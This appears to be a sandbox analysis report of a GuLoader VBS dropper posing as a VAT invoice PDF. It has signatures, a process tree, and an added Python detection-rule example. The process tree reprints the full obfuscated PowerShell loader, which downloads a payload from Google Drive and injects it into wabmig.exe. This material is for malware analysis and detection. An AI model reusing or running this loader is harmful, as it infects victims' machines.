Analysis

  • max time kernel
    148s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    16-09-2024 10:32

General

  • Target

    Faktura_VAT__U2409161195150793564·pdf.vbs

  • Size

    39KB

  • MD5

    a8eaec0ce9a1a02805ca7248d61dce62

  • SHA1

    3adc63cda4f1d797b49b0ae721cbb41caecda524

  • SHA256

    c54caab4e2957ad82b579e23bb079984b7aaf13484f8c5989a6b4aa84048bc2c

  • SHA512

    aac88d2ba244c376eee4ce0ea38050b95e45f682d7f667b11d016e77822484864f5c6b7fa8b0ea6bc98463c2e3dcfd0bdc3bd2bc16204368109512d28ecd472a

  • SSDEEP

    384:Z9vOg3gWe95Arw8M+OJWlZjYUKsA8r7Opt/in6M6zyQQZWnspmErww6u3TTluQeW:Zp3gWU8MaSpBm6eMs34W30atvp

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode-based downloader, first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 3 IoCs

    Attempts to gather information on the host's network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
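
The behaviours above correspond to the chain in the process tree below: WScript.exe launches a 64-bit powershell.exe, which goes through cmd.exe to re-launch itself under the SysWOW64 (32-bit) PowerShell host, which then starts the argument-less, Microsoft-signed wabmig.exe that receives the WriteProcessMemory / SetThreadContext / MapViewOfSection activity. As an added example (not part of this report and not any vendor's rule set), the Python below applies four detection rules to a constructed process-creation event stream that mirrors that tree. The rule names, the 1000-character command-line threshold, the parent PID of WScript.exe, and the shortened stand-in for the obfuscated script body are assumptions.

```python
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (the fields the rules below consume)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stand-in for the multi-kilobyte obfuscated script seen in the tree.
OBF_BODY = "<#Securement Insole #>;" + "Gunnybag (Unmordant 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');" * 40

# Constructed events: PIDs, images and command shapes follow the process tree on
# this page; the WScript.exe parent PID (1000) is invented.
EVENTS = [
    ProcEvent(2096, 1000, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_VAT__U2409161195150793564·pdf.vbs"'),
    ProcEvent(2372, 2096, PS64, f'"{PS64}" "{OBF_BODY}"'),
    ProcEvent(2736, 2372, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"'),
    ProcEvent(2628, 2372, r"C:\Windows\system32\cmd.exe",
              f'"C:\\Windows\\system32\\cmd.exe" /c ^"{PS32}^" "{OBF_BODY}"'),
    ProcEvent(2744, 2628, PS32, f'"{PS32}" "{OBF_BODY}"'),
    ProcEvent(2608, 2744, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"'),
    ProcEvent(1700, 2744, r"C:\Program Files (x86)\windows mail\wabmig.exe",
              r'"C:\Program Files (x86)\windows mail\wabmig.exe"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LONG_CMDLINE = 1000  # assumed threshold; legitimate interactive launches are far shorter


def _name(path):
    """Lower-cased file name of a Windows path (works on any OS, unlike os.path.basename)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has_args(cmdline):
    """True if anything follows the (possibly quoted) executable token."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.split(" ", 1)[1] if " " in s else ""
    return bool(rest.strip())


def ancestry(by_pid, pid):
    """[self, parent, grandparent, ...] as far as the event set reaches; loop-safe."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """Return (rule, pid) alerts for the four chain features described in the lead-in."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        chain = ancestry(by_pid, e.pid)
        parent = chain[1] if len(chain) > 1 else None
        name = _name(e.image)
        # R1: a script host (WScript/CScript) starting PowerShell.
        if name == "powershell.exe" and parent and _name(parent.image) in SCRIPT_HOSTS:
            alerts.append(("script_host_to_powershell", e.pid))
        # R2: PowerShell running under SysWOW64 with a System32 PowerShell in its
        # ancestry, i.e. the 64-bit host re-launching the script in a 32-bit host.
        if name == "powershell.exe" and "\\syswow64\\" in e.image.lower() and any(
                _name(a.image) == "powershell.exe" and "\\system32\\" in a.image.lower()
                for a in chain[1:]):
            alerts.append(("powershell_32bit_relaunch", e.pid))
        # R3: PowerShell spawning a Program Files binary with no arguments, the
        # usual shape of a hollowing target such as wabmig.exe here.
        if parent and _name(parent.image) == "powershell.exe" \
                and e.image.lower().startswith("c:\\program files") and not _has_args(e.cmdline):
            alerts.append(("powershell_spawns_argless_programfiles_binary", e.pid))
        # R4: an oversized PowerShell command line that opens with a comment block.
        if name == "powershell.exe" and len(e.cmdline) > LONG_CMDLINE and "<#" in e.cmdline:
            alerts.append(("oversized_obfuscated_powershell_cmdline", e.pid))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:50s} pid={pid}")
```

Each rule alone is noisy on a busy estate (administrators do launch PowerShell from logon scripts); the value is in the chain: R1, R2, R3 and R4 all firing on one ancestry, as they do for PIDs 2372, 2744 and 1700 here, is what justifies isolating the host.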

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_VAT__U2409161195150793564·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. 
AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal 
yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. 
Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. 
loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2372
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"
        3⤵
          PID:2736
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. 
AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal 
yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. 
Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. 
loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:2628
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. 
